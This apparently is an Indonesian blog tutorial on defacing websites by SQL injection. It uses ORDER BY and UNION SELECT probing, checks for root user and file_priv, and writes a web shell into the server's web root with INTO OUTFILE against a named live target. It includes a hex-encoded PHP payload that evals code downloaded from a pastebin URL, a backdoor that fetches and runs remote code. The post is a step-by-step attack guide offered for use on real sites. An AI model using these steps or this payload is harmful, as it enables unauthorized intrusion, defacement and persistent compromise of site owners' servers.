WHAT'S NEW?
Loading...

Deface Sql Into Outfile

Cara Deface Website
 Menggunakan
Teknik Into Outfile



Kali ini gw mau kasih cara deface dengan teknik into outfile.. Into outfile sendiri artinya kita langsng up shell pada sebuah website tanpa harus menjadi admin dari web tersebut.. Gw juga akan kasih live targetnya.. Biar gk kelamaan langsng aja..

Live target :

Langkah pertama untuk mengecek vuln sql auto tidak pada sebuah website ktta beri tanda string (').. 


Vuln gan.. Kemudian kita simpan tulisan C:\xampp\htdocs\portal_bpkpad\pages\single_page.php on line 149 dicatatan buat penempatan shell backdoor kita difinalnya:V"..

Next selanjutnya kembali ketarget kita


Disini kita cari angka cantiknya dulu ya
Klo masih eror berarti kita harus cari angkanya lg klo gak eror berarti itu lah angka cantiknya..

Trus cara mencari angka cantiknya bgaimana caranya? 

Kita tambahkan +order+by+angkacantik--+

Contoh target kita 


Kalaw masih seperti itu cari lagi sampe gk error.. 


Lahh kalaw sudah kembali seperti semula berarti itu angka cantiknya.. 

Trus klo kita udh dapat angka cantiknya, selanjutnya 
Kita ganti yg +order+by+
Dengan +union+select+
Dan tambahkan angka dari 1 sampai angka cantiknya
Contoh


Kemudian kita tambahkan minus (-) diblkang id= contoh seperti digambar, fungsinya kita cari angka string user



Next selanjutnya kita cek usernya
Klo usernya root local berarti bisa di sql

Trus caranya bagaimana? 
Kita ganti angka string usernya yg tadi angka 4 dengan user().. Liat gambar dibawah



Next selanjutnya kita cek lg permissonnya
Klo Y berarti bisa di sql
Klo N berarti tidak bisa disql

Trus caranya bagaimana?

Tinggal kita ganti lg yg user() menjadi file_priv

Berarti seperti ini

Trus tambahkan lg setelah angka cantik +from+mysql.user

Seperti ini

Maka disitu lah jawabannya bisa atau tidaknya..
Klo jawabanya Y berarti bisa disql. Kalaw N berarti tidak bisa ok..


Krna target kita jawabannya Y berarti bisa disql

Next selanjutnya kita hapus lg, kita kembalikan lg kesemula target kita
Seperti ini

Lalu kita tambahkan kode hexa shell atau uploader kita diangka string user

Ini angka hexa shell mini gw

0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f69514462764a65752229293b3f3e

Jadi seperti ini



Next selanjutnya kita tambahkan +INTO+OUTFILE'(Dir in yg tadi gw suruh simpan dinote)/namashell.php'

Contoh:
+INTO+OUTFILE'C:\xampp\htdocs\portal_bpkpad\pages/FALKA.php'

And jngan lupa kita ubah stringnya dari ini \ menjadi /

Mka akan seperti ini:
+INTO+OUTFILE'C:/xampp/htdocs/portal_bpkpad/pages/FALKA.php'

Kita tambahkan setelah angka cantik tadi 


Nah klo sudah tinggal kita masuk ke dirnya targetnya ajj deh



Lahh udh ketanem shellnya.. Kalaw udh gitu you know lah tinggal apa:V"..



Kwkwkkwkkkw.. Susah? Yah emng gan.. Pkoknya banyak" baca + praktek..
Thanks.. See You In Next Post
#Share and coment

0 komentar:

Posting Komentar